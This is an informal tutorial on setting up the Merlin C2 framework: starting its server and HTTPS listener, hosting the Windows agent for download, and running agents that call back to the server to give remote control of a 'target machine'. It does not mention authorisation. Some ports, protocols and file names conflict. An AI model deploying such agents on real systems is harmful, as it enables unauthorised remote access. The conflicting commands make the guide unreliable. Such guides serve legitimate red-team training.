Merlin C2 Framework Setup and Usage Guide

This guide provides a step-by-step methodology for downloading, installing, configuring, and using the Merlin C2 framework. By following this documentation, you will be able to set up and run the Merlin server, configure listeners, deploy agents, and interact with them effectively.

Step 1: Downloading and Extracting Merlin C2

1. Download the Latest Version of Merlin

Go to the Merlin GitHub Releases Page to download the latest version of the framework.

Download the latest version -> Use the following wget command to download the server file:

Example:

wget https://github.com/Ne0nd0g/merlin/releases/download/v2.1.3/merlinServer-Linux-x64.7z

2. Extract the Compressed File

After the file has been downloaded, extract it using the 7z tool.

Use the following command to extract the file:

7z x merlinServer-Linux-x64-v2.1.3.7z

Note: The extracted files are password-protected. The password for extraction is merlin.

Step 2: Running the Merlin Server

1. Start the Merlin Server

Navigate to the folder where the server has been extracted and run the Merlin server with the following command:

./merlinservername

Example:

./merlinServer

2. Verify Server is Running

Once the server is running, open new terminal at same location and navigate to the directory /data/bin to access the compiled Merlin CLI and agent files:

cd /data/bin

3. Start the Merlin CLI

Run the Merlin CLI in the /data/bin directory with the following command:

./merlinCLI

4. Start the Listeners

With the CLI running, initiate the listeners using the command:

listeners

5. Configure Merlin to Listen on All IPs

If you wish to run Merlin on a global IP address (allowing access from any device in the network), follow these steps:

• Use protocol HTTP, HTTPS, etc use HTTPS (to choose HTTPS protocol):
• Set the interface to 0.0.0.0 (to listen on all interfaces):

set Interface 0.0.0.0

• Set the port to 8443 (or any other port of your choice):

set Port 8443

• Use the show command to verify the listener’s status:

show

• Start the listener:

start

Step 3: Running the Merlin Agent

1. On Kali Linux

Open a new terminal window and run the Merlin agent with the default URL pointing to the server:

./merlinAgent -url http://127.0.0.1:443

As listener is configure on global ip you can use your host ip also insted of local host,

Once the agent is running you can see the session is created and listner is started listning the agent.

2. On Windows

Send the Windows agent to the Windows machine.

Use a Python server to share the Windows agent:

python3 -m http.server {port}

Access the server from the Windows browser and download the Windows Merlin agent.

Go to the folder where the agent is downloaded, open the Command Prompt (CMD) in that directory, and run the Merlin agent:

.\windowsmerlinagentname -url https://ip_of_machine_where_server_is_running:port_no 

3. Listing the Agents

To view all running agents, use the sessions command:

sessions

Step 4: Interacting with the Agents

1. Interacting with an Agent

To interact with a specific agent, use the interact command followed by the agent's ID (listed in the sessions output):

interact agent_id 

2. Available Commands

After successfully interacting with the agent, type help to see a list of available commands that you can execute on the agent machine.

Now you have successfully gain the acces of the target machine where the agent is runnign

This guide provides a clear and structured approach for anyone to follow and set up the Merlin C2 framework. Ensure that you follow each step carefully and verify your setup at each stage to avoid any issues.